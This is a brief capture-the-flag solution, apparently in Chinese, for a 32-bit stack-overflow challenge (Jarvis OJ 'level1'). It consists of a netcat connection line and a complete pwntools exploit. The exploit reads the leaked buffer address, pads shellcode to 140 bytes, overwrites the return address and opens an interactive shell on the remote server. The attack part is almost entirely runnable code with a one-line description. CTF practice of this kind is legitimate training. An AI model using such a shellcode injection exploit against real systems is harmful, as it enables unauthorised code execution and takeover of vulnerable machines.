nc pwn2.jarvisoj.com 9877
level1.80eacdcd51aca92af7749d96efad7fb5
32位栈溢出,ret2shellcode
exp如下:
from pwn import * #io = process('./level1') io = remote('pwn2.jarvisoj.com', 9877) context.arch = 'i386' context.os = 'linux' shellcode = asm(shellcraft.sh()) io.recvuntil("What's this:") buf_addr = int(io.recvuntil('?', drop = True), 16) info("buf_addr:" + str(hex(buf_addr))) payload = shellcode.ljust(140, b'\x90') payload += p32(buf_addr) io.send(payload) io.interactive()